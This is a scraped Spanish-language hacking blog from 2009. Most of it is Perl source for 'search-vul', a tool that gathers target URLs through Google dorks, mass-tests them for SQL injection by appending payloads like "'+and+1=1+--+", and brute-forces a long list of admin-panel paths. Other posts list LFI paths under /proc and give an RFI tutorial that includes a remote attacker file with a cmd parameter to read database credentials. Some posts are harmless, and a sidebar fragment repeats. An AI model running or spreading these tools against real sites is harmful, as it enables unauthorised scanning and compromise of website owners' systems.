Web:     www.yoyahack.blogspot.com
Webs:    www.undersecurity.net & www.mitm.cl
Gretz: S[e]C, seth, p0fk, ksha, OzX, protos, NorK, C1c4Tr1Z
                         _                      _ 
 ___  ___  __ _ _ __ ___| |__      __   ___   _| |
/ __|/ _ \/ _` | '__/ __| '_ \ ____\ \ / / | | | |
\__ \  __/ (_| | | | (__| | | |_____\ V /| |_| | |
|___/\___|\__,_|_|  \___|_| |_|      \_/  \__,_|_|
 
=cut
 
#opciones
=pod
--google <busqueda> --num <numero> -> Buscar paginas de google.com y indica el numero de pagina a buscar
--googles <busqueda> --num <numero> -> Buscar pagina de distinto servidores googles
--vul <file.txt> -> Escanea un archivo que contenga distinta pagina y verifica las vurnerables
--dns <site> -> Reverse dns
=cut
 
#Modulos
 
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;
 
#Code
 
print q(
Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·
                 Code 
                  by
               Yoyahack
         www.yoyahack.blogspot.com
     www.undersecurity.com & www.mitm.cl
Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·
);
 
print "Usage: perl $0 --opcion <xxx>\n";
print q(
--google <busqueda> --num <numero>
--googles <busqueda> --num <numero>
--vul <file.txt>
--dns <site>
);
 
#Opciones
GetOptions("google=s" => \$google, 
           "googles=s" => \$googles,
           "vul=s" => \$vul,                
           "dns=s" => \$dns,
           "num=s" => \$num);
 
if($google & $num){&google};
if($googles & $num ){&googles};
if($vul){&vul};
if($dns){&dns};
 
sub google{
 
###########################################################
my $peti = "http://www.google.com/search?hl=&q=$google&start=$num";
my $result = get($peti);
 
###########################################################
    while ($result =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
 
        my $enlace = $1;
        open (SE,">>busqueda.txt");
        print SE "$enlace\n";
        close (SE);
        print "$enlace\n"; 
                                                                    }
           } 
 
 
 
sub googles{
 
###########################################################
my @googles = qw(www.google.es www.google.cl www.google.com.ar www.google.co.ve);
foreach $go(@googles)
               { 
                chomp($go);
###########################################################
my $peti1 = "http://$go/search?hl=&q=$googles&start=$num";
my $result1 = get($peti1);
 
###########################################################
    while ($result1 =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
    my $enlace1 = $1;
 
    open (SS,">>googles.txt");
    print SS "$enlace1\n";
    close (SS);
    print "$enlace1\n";
                                                                       }
              }
           }
 
 
sub vul{
###########################################################
open(PAG,$vul) || die "Archivo de texto no encontrado";
@urls=<PAG>;
close (PAG);
foreach $pag(@urls)
               { 
               chomp($pag);
###########################################################
my $iny1 = $pag."'+and+1=1+--+";
my $iny2 = $pag."'+and+1=2+--+";
##########################################################
my $fuente = get($iny1);
my $tofo  = scalar(split("\n",$fuente));
 
my $result = get($iny2);
my $todo  = scalar(split("\n",$result));
##########################################################
if($tofo ne $todo){
    open (VUL,">>vurl.txt");
    print VUL q(
Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·
                 Code 
                  by
               Yoyahack
         www.yoyahack.blogspot.com
     www.undersecurity.com & www.mitm.cl
Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·
 
);
    print VUL "$pag\n";
    close (SS);
    print "[+]$pag es vurnerable a SQLI\n";
    print "!guardada exitosamente\n";
   } else {
             print "\n$pag no es vurnerable a SQLI\n"; 
         }
          }               
               }
 
sub dns{
my $result = get("http://www.ip-adress.com/reverse_ip/$dns");
 
while ($result =~ m!<a href="/whois/(.+)">Whois</a>!ig){
 
    open (DNS,">>reverse_dns.txt"); 
    print DNS "$1\n";
    close (DNS);
    print "$1\n";
 
} 
if ($result =~ /valid IP address/) {
 
    print "Not found\n";
}
}
 
sub get {
    my $pagina = $_[0];
 
    my $ua = new LWP::UserAgent;
    $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
 
    my $busqueda = new HTTP::Request GET => $pagina;
    my $resultado = $ua->request($busqueda);
    $ua->timeout(7) || die "Conecction faield";
    my $result = $resultado->content();
}

search-vul 0.2

2009-10-04T17:51:00.000-07:00

Bueno por fin termine la segunda version de mi tools.

search-vul 0.2

Caracteristica:

Busca pagina mediante google
Buscar paginas web mediante distinto servidores googles
Opción para examinar un lista de paginas webs en busca de algunas vulnerables a sqli
Reverse dns
Buscador del panel de control


=pod
Autor:   Yoyahack
name:    search-vul
verion:  0.2
Mail:    yoyahack@undersecurity.net
Web:     www.yoyahack.blogspot.com
Webs:    www.undersecurity.net & www.mitm.cl |
Descripcion: ->                              v
Busca pagina mediante googles o algunos servidores googles - Opcion para examinar un lista de pagininas webs
en busca de algunas vurnerables a sqli - Reverse dns - Buscador del panel de control
Gretz: S[e]C, seth, p0fk, ksha, OzX, protos, n0b0dy, NorK, C1c4Tr1Z 
=cut

#Modulos

use LWP::UserAgent;
use HTTP::Request;

#Code
print q(
Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·
                 Code 
                  by
               Yoyahack
         www.yoyahack.blogspot.com
     www.undersecurity.com & www.mitm.cl
Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·
);
print q (
 
1- Solo www.google.com
2- En todos los servidores google
3- Escanear una lista de paginas guardada en un archivo 
de texto en busca de vurnerabilidades
4- Reverse dns
5- Buscador de panel de control
);
 
print "Escoje una opcion: ";
$opcion = <STDIN>;
 
if ($opcion == 1) { &google }
if ($opcion == 2) { &googles }
if ($opcion == 3) { &vul }
if ($opcion == 4) { &dns }
if ($opcion == 5) { &panel }
 
sub google {
 
print "Escriba la palabra a buscar: ";
my $search = <STDIN>;
 
print "\nnumero de paginas: ";
my $num = <STDIN>;
 
#------------------------------------------------
 
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
 
#------------------------------------------------
 
for($i=1;$i<$num;$i++){
    my $busqueda = new HTTP::Request GET =>"http://www.google.com/search?hl=&q=$search&start=$i";
    my $resultado = $ua->request($busqueda);
    $ua->timeout(7) || die "Conecction faield";
    my $result = $resultado->content();
 
    while ($result =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
        my ($enlace) = ($1);
 
        open (SE,">>busqueda.txt");
        print SE "$enlace\n";
        close (SE);
        print "$enlace\n"; 
 
          }
                         }
                                                                        }
 
 
sub googles {
 
print "Escriba la palabra a buscar\n";
my $bus1 = <STDIN>;
 
print "Numero de paginas a buscar en cada servidor google\n";
my $num1 = <STDIN>;
 
#------------------------------------------------
 
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
 
#------------------------------------------------
 
foreach $googles(@googles)
               { 
               chomp($googles);
 
#------------------------------------------------
 
for($ii=1;$ii<$num1;$ii++){
    my $busqueda1 = new HTTP::Request GET =>"http://$googles/search?hl=&q=$bus1&start=$ii";
    my $resultado1 = $ua->request($busqueda1);
    $ua->timeout(7) || die "Conecction faield";
    my $result1 = $resultado1->content();
 
    while ($result1 =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
    my ($enlace1) = ($1);
 
    open (SS,">>googles.txt");
    print SS "$enlace1\n";
    close (SS);
    print "$enlace1\n";
 
            } 
                }     
                           }
                                                                        }
 
 
sub vul {
 
print "Escanear todas las url obtenida en busca de paginas vurnerables a Mysql? ";
 
print q(
1 = verificar las paginas vurnerables
2 = No verificar y salir del code
);
print "\nElige una opcion\n";
 
my $op2 = <STDIN>;
 
if ($op2 == 1) { &mysql }
if ($op2 == 2) { exit(0); }
 
        }
 
sub mysql {
 
print q(
Nombre del archivo de texto
en el que esta guardado las listas de paginas
 
);
my $txt = <STDIN>;
 
#------------------------------------------------
open(PAG,$txt) || die "Archivo de texto no encontrado";
@urls=<PAG>;
close (PAG);
#------------------------------------------------
 
foreach $pag(@urls)
               { 
               chomp($pag);
 
#------------------------------------------------
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
#------------------------------------------------
 
#------------------------------------------------
print "Comprovando paginas vurnerables a Mysql\n\n";
 
my $iny = $pag."'";
my $peti = new HTTP::Request GET =>"$iny";
my $resul = $ua->request($peti);
$ua->timeout(7) || die "Conecction faield to host";
my $fuente = $resul->content();
 
if($fuente =~ /mysql_fetch_/ || $fuente =~ /You have an error in your SQL syntax/ || $fuente =~ /tem um erro de sintaxe no seu SQL/ ||         $fuente =~ /Algo estÃ¡ equivocado en su sintax/ || $fuente =~ /Division by zero in/ || $fuente =~ /supplied argument is not a valid MySQL/){
 
    open (VUL,">>vurl.txt");
    print VUL q(
Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·
                 Code 
                  by
               Yoyahack
         www.yoyahack.blogspot.com
     www.undersecurity.com & www.mitm.cl
Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·Â·
 
);
    print VUL "$pag\n";
    close (SS);
    print "[+]$pag es vurnerable a SQLI\n";
    print "\nLas paginas vurnerables han sido guardada exitosamente\nen un archivo de texto\n";
   } else {
             print "\n\n$pag no es vurnerable a SQL"; 
         }
          }               
               }

sub dns {


print "Ingresa la web\n";
my $web = <STDIN>;

my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
 
my $busqueda = new HTTP::Request GET =>"http://www.ip-adress.com/reverse_ip/$web";
my $resultado = $ua->request($busqueda);
$ua->timeout(7) || die "Conecction faield";
my $result = $resultado->content();
 
while ($result =~ m!<a href="/whois/(.+)">Whois</a>!ig){
  
    open (DNS,">>reverse_dns.txt");
  
    print DNS "$1\n";
    close (DNS);
    print "$1\n";
 
 
}
 
if ($result =~ /valid IP address/) {
   
    print "Not found\n";
}
}

sub panel{

print "Inserte la web\nEx:http://www.pagina.com/\n\n";

my $pag = <STDIN>;
chomp($pag);

#------------------------------------


@panel = ('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
);

#----------------------------------
print "Buscando panel de control\n";

foreach $panel(@panel) {
        chomp($panel);


my $todo = "$pag"."$panel";
my $lwp = HTTP::Request->new(GET=>"$todo");
my $ua = LWP::UserAgent->new();
$ua->timeout(10);
my $response = $ua->request($lwp);
my $peti = $response->content();



if ($peti =~ /Username/ ||
$peti =~ /Password/ ||
$peti =~ /username/ ||
$peti =~ /password/ ||
$peti =~ /USERNAME/ ||
$peti =~ /PASSWORD/ ||
$peti =~ /Senha/ ||
$peti =~ /senha/ ||
$peti =~ /Personal/ ||
$peti =~ /Usuario/ ||
$peti =~ /Clave/ ||
$peti =~ /Usager/ ||
$peti =~ /usager/ ||
$peti =~ /Sing/ ||
$peti =~ /passe/ ||
$peti =~ /P\/W/ || 
$peti =~ /Admin Password/
){
    open (P,">>panel de control");
    print P "{+}Found -> $todo\n";
    close (P);
    print "{+}Found -> $todo\n";
}else{
    print "$todo Not found\n";
}
 }
}

Descargar openSUSE 11.1

2009-09-27T15:22:00.000-07:00

Bueno en esto día estuve probando este distrito.

Ps le dejo el link de descarga para lo que quieren descargarlo.

openSUSE 11.1

------------------------
32 bit - LiveCd

Descargar para KDE4

Descargar para GNOME

------------------------

64 bit - LiveCd

Descargar para KD4

Descargar para GNOME

------------------------

Saludos xD.

Cómo quemar un .ISO desde la linea de comandos

2009-09-27T15:18:00.001-07:00

Bueno aquí un simple comando para quemar un .ISO desde la linea de comando.

wodim name.iso

Opciones de wodim

man wodim

Saludos.

Encode text en html entities en perl

2009-09-23T12:41:00.000-07:00

Bueno aquí mi code para que encode sus texto a html entities, muy bueno para los blogs.


#Autor: Yoyahack
#Webs:  www.yoyahack.blogspot.com - www.undersecurity.net
#mail:  elmafioso.edwin@gmail.com
#Encode strings with HTML entities

#Module

use HTML::Entities;

#Code

print "\nYoyahack - www.yoyahack.blogspot.com\nwww.undersecurity.net\n";
print "\nUsage: perl name.pl <archive.txt>\n";
print "Ex: perl script.pl archive.txt\n";

open(AR,"$ARGV[0]") || die "\nNot found archive\n";
@ar=<AR>;
close (AR);

foreach $encode(@ar)
              {
              chomp($encode);

encode_entities( $encode );

open (SAVE,">>encode_text.txt");
print SAVE "$encode\n";
close (SAVE);


             }

print "\nSuccessfully saved text file!\n";
exit(0);

Reverse DNS en perl

2009-09-21T12:24:00.000-07:00

Bueno aquí un reverse dns que acabo de codear.

Modo de uso:

perl name.pl www.pagina.com

Guardas las webs en un archivo de texto.

Code:


#Autor: Yoyahack
#Webs: www.yoyahack.blogspot.com  -  www.undersecurity.net
#Reverse dns

#Modulos

use LWP::UserAgent;
use HTTP::Request;

#Body

print q(
Reverse Dns by yoyahack
www.yoyahack.blogspot.com - www.undersecurity.net
);

print "Usage: perl script.pl <web>\n";
print "Ex: perl reversedns.pl www.pagina.com\n";
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

my $busqueda = new HTTP::Request GET =>"http://www.ip-adress.com/reverse_ip/$ARGV[0]";
my $resultado = $ua->request($busqueda);
$ua->timeout(7) || die "Conecction faield";
my $result = $resultado->content();

while ($result =~ m!<a href="/whois/(.+)">Whois</a>!ig){


   open (DNS,">>reverse_dns.txt");
   print DNS "$1\n";
   close (DNS);
   print "$1\n";
  
}

Paths LFI más allá de /etc/passwd by Refused

2009-09-11T15:13:00.000-07:00

Bueno este post lo vi en infiernohacker, me pareció muy interesante.

/proc/

En el directorio /proc/ podemos ver información sobre el kernel, el sistema, hardware,etc.
Paths:
/proc/version
/proc/interrupts
/proc/meminfo
/proc/mounts
/proc/modules
/proc/partitions
/proc/filesystems
/proc/kallsyms
/proc/cpuinfo
/proc/cmdline

/proc/self

El diretorio /proc/self es un enlace al proceso en ejecución.
Paths:
/proc/self/environ

/proc/sys/

El directorio /proc/sys proporciona informacion pero tambien (siendo administrador) se pueden activar o desactivar caracteristicas del kernel.
Paths:
/proc/sys/fs
/proc/sys/dev/
/proc/sys/kernel/
/proc/sys/kernel/acct
/proc/sys/kernel/cap-bound
/proc/sys/kernel/domainname
/proc/sys/kernel/exec-shield
/proc/sys/kernel/exec-shield-randomize
/proc/sys/kernel/hostname
/proc/sys/kernel/hotplug
/proc/sys/kernel/modprobe
/proc/sys/kernel/version
/proc/sys/kernel/sysrq
/proc/sys/net/core/
/proc/sys/net/ipv4/
/proc/sys/vm/
/proc/sysvipc

/proc/net/

El directorio /proc/net muestra información sobre la configuracion de red del sistema.
Paths:
/proc/net/arp
/proc/net/atm
/proc/net/dev
/proc/net/dev_mcast
/proc/net/igmp
/proc/net/ip_conntrack
/proc/net/ip_tables_names
/proc/net/ip_mr_cache
/proc/net/ip_mr_vif
/proc/net/netstat
/proc/net/psched
/proc/net/raw
/proc/net/route
/proc/net/rt_cache
/proc/net/snmp
/proc/net/sockstat
/proc/net/tcp
/proc/net/tr_rif
/proc/net/udp
/proc/net/unix
/proc/net/wireless

/proc/driver/

El directorio /proc/driver contiene información sobre los drivers que se estan utilizando.

Fuente

Algunos addons para firefox

2009-09-11T15:03:00.000-07:00

Bueno aquí algunos addons, son muy bueno todos xD.

User Agent Switcher 0.7.2

Live HTTP Headers 0.15

Firebug 1.4.2

Saludos.

search-vul 0.1

2009-09-09T17:48:00.000-07:00

Bueno aquí mi tools, sus característica son:

Busca paginas mediante google
Te da la opción de buscar paginas webs mediante distinto servidores google.
Abre un archivo de texto en la que están guardada todas las web y verifica las posibles vulnerabilidades a sqli.

Ps aqui una captura

Descargar

Tutorial de reverse DNS

2009-09-07T20:02:00.001-07:00

Bueno este es un tutorial que hise hase un tiempo y como no lo habia publicado ps lo publico esta en un archivo pdf.

Descargar

Automatisador de busqueda de google en perl v0.2

2009-09-07T19:38:00.000-07:00

Bueno este es la segunda version de google search en perl hecha por mi, ps en esta version guarda
los enlaces en un archivo de texto por default llamado 'enlaces.txt' si quieren alguna mejora ps decirlo.



#Autor:   Yoyahack


#Version: 0.2





use LWP::UserAgent;


use HTTP::Request;


 


print "Modo de uso:\n";


print "Perl name.pl <busqueda> <numeros de paginas>\n";


print "perl name.pl inurl:noticias.php?id=1 50\n";


 


my $ua = new LWP::UserAgent;


$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");


 


for($i=1;$i<$ARGV[1];$i++){


    my $busqueda = new HTTP::Request GET =>"http://www.google.com/search?hl=es&q=.$ARGV[0].&start=$i&sa=N";


    my $resultado = $ua->request($busqueda);


    $ua->timeout(7);


    my $result = $resultado->content;


 


    while ($result =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {


        my ($enlace) = ($1);


        open (SAVE, ">>enlaces.txt");


        print SAVE "\n$enlace\n";


        print "$enlace\n";


        close(SAVE);


}


}


#Gretz:   S[e]C, seth, OzX, p0fk

Creando un code en perl I

2009-09-07T15:40:00.000-07:00

Bueno este es un tuto que hise de como llegue a crear un script en perl parte por parte, espero que sea muy explicativo.

Descargar

Automatisador de busqueda de google en perl

2009-08-25T12:54:00.001-07:00

Bueno este script lo cree cuando comense a programar con sockets en perl, le agradesco a la comunidad undersecurity que me ayudo mucho y en especial a mi amigo s[e]c.

Modo de uso

perl script.pl noticias.php 10



#Autor:   Yoyahack<br />


 <br />


use LWP::UserAgent;<br />


use HTTP::Request;<br />


 <br />


print "Modo de uso:\n";<br />


print "Perl name.pl  \n";<br />


print "perl name.pl inurl:noticias.php?id=1 50\n";<br />


 <br />


my $ua = new LWP::UserAgent;<br />


$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");<br />


 <br />


for($i=1;$i<$ARGV[1];$i++){<br />


    my $busqueda = new HTTP::Request GET =>"http://www.google.es/search?hl=es&q=.$ARGV[0].&start=$i&sa=N";<br />


    my $resultado = $ua->request($busqueda);<br />


    $ua->timeout(7);<br />


    my $result = $resultado->content;<br />


 <br />


    while ($result =~ m/(.*?)<\/a>/g) {<br />


        my ($enlace) = ($1);<br />


        print "$enlace\n";<br />


}<br />


}<br />


#Agradesco a la comunidad undersecurity que me ayudo mucho en la elavoracion del code y a s[e]c que me ayudo con algunos #errorres

[Tutorial] Remoto file inclusion (RFI)

2009-08-22T10:49:00.000-07:00

Que es Remoto file inclusión (RFI) ?
Remote file inclusión (Inclusión remota de archivo) esta vulnerabilidad que permite el enlace de
archivos remotos situados en otros servidores a causa de una mala programación de la página
que contiene la función include ().

Algunas funciones vulnerables a RFI son:

Include ()
Include_once ()
require ()
require_once ()

Por ejemplo:
En una parte del index.php esta este code:

Lo que hace este code es incluir archivos remotamente mediante la variable
$f.

www.pagina.com/index.php?f=caciones.php

Lo que esta haciendo es incluyendo archives mediante la variable f.
Entonces se explotaría de la siguiente forma:

www.pagina.com/index.php?f=http://tupagina.com/archivo.txt?

Bueno Recuerde que su code tiene que estar en extensión .txt .gif. .jpg etc.... menos en php
porque se ejecutaría en nuestro servidor.

Entonces creamos un archivo con extensión .txt y le ponemos el code que se ejecutaría en su
servidor, bueno en este caso yo le pondré este:

Que sirve para ejecutar comandos en el servidor y se explotaría de la siguiente manera:

www.pagina.com/index.php?page=http//www.tupafina.com/archivo.txt?cmd=cat
config

Lo que estaría viendo la configuración de la BD y poder sacar el password de la BD.

Bienvenidos

2009-08-06T10:44:00.000-07:00

Wenas a todos, bienvenido a mi blog donde intentare compartir mis conocimientos con todas las personas que les interes.

Saludos.

Yoyahack

Diseño nuevo y blog nuevo

Bypass Recaptcha y cualquier otra

File Path Injection - PHP <= 5.3.6

Utilizar fuentes de Google font en Blogger

Creando aplicación que se conecte a una web y inicie session

Manejo de excepciones en PHP

Explicación de INTO OUTFILE en una Inyección SQL

Passive Group - Expresiones Regulares

[PHP Class] HttpLoginConnect

Mysql Connection Hijacking

¿empty o isset?

Capturacion global con Expresiones Regulares en Perl y PHP

phpAuthentAdmin 0.2.1 permanent XSS

Bypass de magic_quotes_gpc() para explotar XSS via POST

Ejemplo de PHP POO ( Programación orientada a objectos)

search-vul 0.4

[optimisada] search-vul 0.3

search-vul 0.2

Descargar openSUSE 11.1

openSUSE 11.1

Cómo quemar un .ISO desde la linea de comandos

Encode text en html entities en perl

Reverse DNS en perl

Paths LFI más allá de /etc/passwd by Refused

Algunos addons para firefox

User Agent Switcher 0.7.2

Live HTTP Headers 0.15

Firebug 1.4.2

search-vul 0.1

Tutorial de reverse DNS

Automatisador de busqueda de google en perl v0.2

Creando un code en perl I

Automatisador de busqueda de google en perl

(.*?)<\/a>/g) {<br /> my ($enlace) = ($1);<br /> print "$enlace\n";<br /> }<br /> }<br /> #Agradesco a la comunidad undersecurity que me ayudo mucho en la elavoracion del code y a s[e]c que me ayudo con algunos #errorres

[Tutorial] Remoto file inclusion (RFI)

Bienvenidos

(.*?)<\/a>/g) {<br />

my ($enlace) = ($1);<br />

print "$enlace\n";<br />

}<br />

}<br />

#Agradesco a la comunidad undersecurity que me ayudo mucho en la elavoracion del code y a s[e]c que me ayudo con algunos #errorres